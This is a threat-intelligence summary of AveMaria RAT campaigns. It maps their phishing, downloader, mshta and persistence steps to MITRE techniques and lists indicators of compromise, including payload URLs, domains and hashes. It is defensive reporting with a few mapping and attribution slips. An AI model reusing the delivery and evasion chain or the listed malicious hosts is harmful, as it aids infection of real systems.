Threat Research

Dynamic Approaches seen in AveMaria’s Distribution Strategy

Securonix

AveMaria distribution campaigns evolved through seven case studies in 2022, showcasing multiple delivery formats and evolving execution steps to evade detection. ThreatLabz notes ongoing updates to AveMaria’s chain, including new techniques like custom downloaders and type casting to decrypt payloads. #AveMaria #ThreatLabz #VHDXCampaign #AUloader_campaign # SerbianCampaign #UkraineISO

Keypoints

  • AveMaria is a Remote Access Trojan (RAT) infostealer with remote camera control and privilege escalation capabilities.
  • Researchers observed significant changes to AveMaria’s execution stages and TTPs over the last six months.
  • Attacks typically begin with phishing emails delivering the malicious payloads (e.g., .vhdx, ISO, or VBScript-based packages).
  • Recent variants decrypt or decrypt-and-load payloads, sometimes via non-HTTP C2 channels and RC4-based encryption.
  • A new variation uses a custom downloader that employs type casting to reconstruct and decrypt the final AveMaria payload in memory.
  • Case studies cover diverse formats: .Vhd(x) campaigns, AUloader, Serbian eID phishing, Ukrainian ISO phishing, VBScript/AutoIt chains, and MSHTA-based delivery.
  • Zscaler Coverage documents detections like PS.Downloader.AveMaria and similar names across multiple campaigns.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – “phishing emails impersonating the Russian government targeted Kazakhstan officials with a malicious .vhdx file disguised as a fake meeting notice.” – Used to deliver initial payloads via email attachments.
  • [T1105] Ingress Tool Transfer – “Stage 1: Custom downloader retrieves an encrypted file from a third party file sharing website and after downloading and decrypting in memory, it executes the decrypted version of the retrieved payload, which is in PE format.”
  • [T1059.001] PowerShell – “Stage 1: VBScript … calls out powershell.exe with commands consisting of two downloading urls.”
  • [T1059.005] VBScript – “The vbscript … on execution, calls out powershell.exe with commands consisting of two downloading urls.”
  • [T1218.005] Mshta – “The bundled HTA file downloads the end payload via mshta.exe.”
  • [T1095] Non-Application Layer Protocol – “C2 communications on non-HTTP protocol, after decrypting its C2 connection using RC4.”
  • [T1547.001] Registry Run Keys/Startup Folder – “adds run key in the registry to achieve persistence.”
  • [T1055] Process Injection – “Stage 2: Second stage DLL … leads to process injection of malware into a legitimate file.”
  • [T1113] Screen Capture – “remote camera control” capability described as part of AveMaria.
  • [T1562.001] Impair Defenses – “exclude the whole drive prior to the initialization of the copied file for further infection, via powershell command.”

Indicators of Compromise (IOCs)

  • [MD5] 18e7c1ff7bbb4816e53315546397543b, 56d1e9d11a8752e1c06e542e78e9c3e4, 3a7ba1f6f92af9ed43cbd590eb404496
  • [File] Adobe5151.exe, gov12.exe, images.exe, AveMaria_payload
  • [URL] 45.61.137.32/www.exe, 20.7.14.99/server/dll2.txt, 80.76.51.222/jfgfhhjhgjkj.txt
  • [Domain] pliblu-fax.home-webserver.de, kashbilly.duckdns.org, odessa-gov.ddns.net, sg tmarkets.com
  • [IP] 171.22.30.72
  • [MD5] 86c697f7284ecb5c68cd35d26aaf634a, 3a7ba1f6f92af9ed43cbd590eb404496
  • [MD5] 3a7ba1f6f92af9ed43cbd590eb404496
  • [File] Adobe5151.exe (Serbia campaign), gov12.exe (Ukraine ISO campaign), images.exe (Serbia campaign)
  • [ISO/ZIP] ISO file attachments observed in Ukraine/Serbia campaigns
  • [Shortcut] 2828f49cde16e65a1bee0c5c44aed8cc (shortcut file involved in mshta/mshta-like flow)

Read more: https://www.zscaler.com/blogs/security-research/dynamic-approachseen-avemarias-distribution-strategy

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint